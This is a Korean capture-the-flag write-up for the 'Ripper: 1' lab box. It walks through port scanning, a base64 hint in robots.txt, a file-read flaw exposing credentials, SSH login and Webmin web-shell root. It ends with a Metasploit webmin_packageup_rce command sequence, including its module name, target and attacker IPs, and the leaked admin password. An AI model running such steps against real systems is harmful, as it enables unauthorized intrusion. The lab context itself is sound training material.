[9월 11일] CTF_Ripper: 1

BOX

 

192.168.16.52

 

22번 80번 10000번

http 접속

 

SSL 모드가 실행중이므로 HTTPS로 접속하라고 뜸

 

 

HTTPS 로 접속한 모습

 

DNS 파일 수정

192.68.16.52 > ripper-min 서버네임 지정

 

ripper-min 으로 HTTPS 접속

 

 

ripper-min의 하위 디렉토리 스캔 결과 robots.txt 발견

 

 

의문의 코드 발견

base64로 디코딩 결과 rips 라는 힌트 획득

 

 

http서버의 rip 하위디렉토리로 접속

 

 

/var/www/ 취약점 분석

 

취약점은 /var/www/html/rips 의 하위 디렉토리에서 발현되는것을 확인

 

디렉토리를 수정하여 파일 내용을 볼 수 있음

 

secret.php라는 수상한 파일 발견 > ripper/Gamespeopleplay 획득

 

 

얻은 정보로 SSH 로그인 접속

 

sudo 불가

 

 

cubes 사용자가 소유한 모든 일반 파일을 시스템 전체에서 찾아 그 파일들의 상세 정보를 나열

 

cubes 사용자가 소유한 모든 일반 파일의 내용을 /mnt/secret.file 파일 뒤에 이어붙이는 명령

 

패드워드 Il00tpeople 획득

 

 

user_flag 획득

 

webmin의 백업 로그 파일 팔견

로그 파일 분석

 

 

 

admin / tokiohotel 정보 획득

 

Webmin 접속

 

 

로그인 성공

대시보드 메뉴에서 커맨드 쉘(웹 쉘) 접속

웹 쉘 에서 root 권한 획득 및 root_flag 획득

 

 

 

 

---

 

웹 쉘 말고 다른 방법으로 root 권한 획득하기

 : MSF6 Console로 접속하기

 

msf6 > use exploitt/linux/http/webmin_packageup_rce 

msf6 exploit > show options

msf6 exploit > set rhosts 192.168.16.52

msf6 exploit > set lhost 192.168.16.103 (kali ip)

msf6 exploit > set username admin

msf6 exploit > set password tokiohotel

msf6 exploit > set ssl true

msf6 exploit > show options

msf6 exploit >  run

 

 

다음 과정을 거치면 root 권한 획득 가능